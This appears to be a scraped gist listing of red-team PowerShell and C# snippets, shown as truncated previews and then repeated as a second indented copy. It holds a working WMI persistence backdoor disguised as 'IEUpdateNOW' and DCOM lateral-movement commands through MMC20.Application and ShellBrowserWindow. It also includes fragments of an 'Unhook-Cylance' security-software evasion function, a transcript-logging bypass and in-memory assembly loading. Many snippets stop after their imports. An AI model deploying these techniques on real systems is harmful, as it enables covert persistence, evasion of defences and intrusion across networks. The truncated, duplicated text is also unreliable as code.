Ben Turner benpturner

## posh.cs
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;

namespace TranscriptBypass
{
    // Compiling with CSC.exe v4.0.30319 or v3.5

## whoami.txt
([Security.Principal.WindowsIdentity]::GetCurrent());
$tl=@{Expression={((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value};Label="Group Name";Width=400}; ([Security.Principal.WindowsIdentity]::GetCurrent()).Groups | FT $tl

## WMIEvent
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer}
#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-
Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-
Backdoor-wp.pdf

## gist:1f31de5331842c25f4eed585d4bd2d65
function Unhook-Cylance() {

$winapi = @"
  using System.Runtime.InteropServices;
  using System;
  public class Win32 {
    [DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)]
    public static extern IntPtr memcpy(IntPtr dest, string src, uint count);
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

## gist:1f2e3e7d7227b3a7e9740bba7a12fc2d
# MMC (Tested Windows 7, Windows 10, Server 2012R2):
dynamic c = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", "127.0.0.1"));
c.Document.ActiveView.ExecuteShellCommand(@"C:\Windows\System32\cmd.exe",null,"/c notepad.exe", "7");

## Detection: svchost.exe -DCOMLaunch (parent cmdline) -> mmc.exe (process)

# ShellBrowserWindow (Tested Windows 10, Server 2012R2):
System.Type com = Type.GetTypeFromCLSID(Guid.Parse("C08AFD90-F2A1-11D1-8455-00A0C91F3880"), "127.0.0.1");
dynamic obj = System.Activator.CreateInstance(com);
obj.Document.Application.ShellExecute("notepad.exe","","c:\\windows",null,0);

## RunAs-NetOnly
 Add-Type -TypeDefinition @"
    using System;
    using System.Runtime.InteropServices;
    using System.Security.Principal;
    public static class Advapi32
    {
        [DllImport("advapi32.dll", SetLastError = true)]
        public static extern bool LogonUser(string pszUsername, string pszDomain, string pszPassword, int dwLogonType, int dwLogonProvider, ref IntPtr phToken);

        [DllImport("advapi32.dll", SetLastError=true)]

## load-csharp-in-ps
# Load C# Module in PS
[System.Reflection.Assembly]::LoadFile("C:\Temp\StandIn.exe")

# Load C# Module in PS from Base64 Blob
$dllbytes = [System.Convert]::FromBase64String("fdsfdsfds")
[System.Reflection.Assembly]::Load($dllbytes)

# Execute C# Module in PS
$Mods=[System.AppDomain]::CurrentDomain.GetAssemblies()
foreach ($Mod in $Mods){if ($Mod.FullName -like "StandIn*") {$Mod.EntryPoint.Invoke($null,@(,[string[]]@(""))) }}

## GetAPICall.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

namespace GetAPICall
{
    class Program
    {
        const uint PROCESS_ALL_ACCESS = 0x000F0000 | 0x00100000 | 0xFFF;

## EventLogSearcher.cs
using System;
using System.Collections.Generic;
using System.Diagnostics.Eventing.Reader;
using System.Text.RegularExpressions;
using System.Threading;

namespace EventLogSearcher
{
    class Program
    {

## GetAadJoinInformation.cs
using System;
using System.Collections.Generic;
using System.Management;
using System.DirectoryServices;
using System.DirectoryServices.ActiveDirectory;
using System.Text;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Collections;
using System.Runtime.InteropServices;
	using System;
	using System.Collections.ObjectModel;
	using System.Management.Automation;
	using System.Management.Automation.Security;
	using System.Management.Automation.Runspaces;
	using System.Reflection;

	namespace TranscriptBypass
	{
	// Compiling with CSC.exe v4.0.30319 or v3.5
	([Security.Principal.WindowsIdentity]::GetCurrent());
	$tl=@{Expression={((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value};Label="Group Name";Width=400}; ([Security.Principal.WindowsIdentity]::GetCurrent()).Groups \| FT $tl
	$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer}
	#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-
	Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-
	Backdoor-wp.pdf
	function Unhook-Cylance() {

	$winapi = @"
	using System.Runtime.InteropServices;
	using System;
	public class Win32 {
	[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)]
	public static extern IntPtr memcpy(IntPtr dest, string src, uint count);
	[DllImport("kernel32")]
	public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
	# MMC (Tested Windows 7, Windows 10, Server 2012R2):
	dynamic c = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", "127.0.0.1"));
	c.Document.ActiveView.ExecuteShellCommand(@"C:\Windows\System32\cmd.exe",null,"/c notepad.exe", "7");

	## Detection: svchost.exe -DCOMLaunch (parent cmdline) -> mmc.exe (process)

	# ShellBrowserWindow (Tested Windows 10, Server 2012R2):
	System.Type com = Type.GetTypeFromCLSID(Guid.Parse("C08AFD90-F2A1-11D1-8455-00A0C91F3880"), "127.0.0.1");
	dynamic obj = System.Activator.CreateInstance(com);
	obj.Document.Application.ShellExecute("notepad.exe","","c:\\windows",null,0);
	Add-Type -TypeDefinition @"
	using System;
	using System.Runtime.InteropServices;
	using System.Security.Principal;
	public static class Advapi32
	{
	[DllImport("advapi32.dll", SetLastError = true)]
	public static extern bool LogonUser(string pszUsername, string pszDomain, string pszPassword, int dwLogonType, int dwLogonProvider, ref IntPtr phToken);

	[DllImport("advapi32.dll", SetLastError=true)]
	# Load C# Module in PS
	[System.Reflection.Assembly]::LoadFile("C:\Temp\StandIn.exe")

	# Load C# Module in PS from Base64 Blob
	$dllbytes = [System.Convert]::FromBase64String("fdsfdsfds")
	[System.Reflection.Assembly]::Load($dllbytes)

	# Execute C# Module in PS
	$Mods=[System.AppDomain]::CurrentDomain.GetAssemblies()
	foreach ($Mod in $Mods){if ($Mod.FullName -like "StandIn*") {$Mod.EntryPoint.Invoke($null,@(,[string[]]@(""))) }}
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Text;

	namespace GetAPICall
	{
	class Program
	{
	const uint PROCESS_ALL_ACCESS = 0x000F0000 \| 0x00100000 \| 0xFFF;
	using System;
	using System.Collections.Generic;
	using System.Diagnostics.Eventing.Reader;
	using System.Text.RegularExpressions;
	using System.Threading;

	namespace EventLogSearcher
	{
	class Program
	{
	using System;
	using System.Collections.Generic;
	using System.Management;
	using System.DirectoryServices;
	using System.DirectoryServices.ActiveDirectory;
	using System.Text;
	using System.Runtime.Serialization.Formatters.Binary;
	using System.IO;
	using System.Collections;
	using System.Runtime.InteropServices;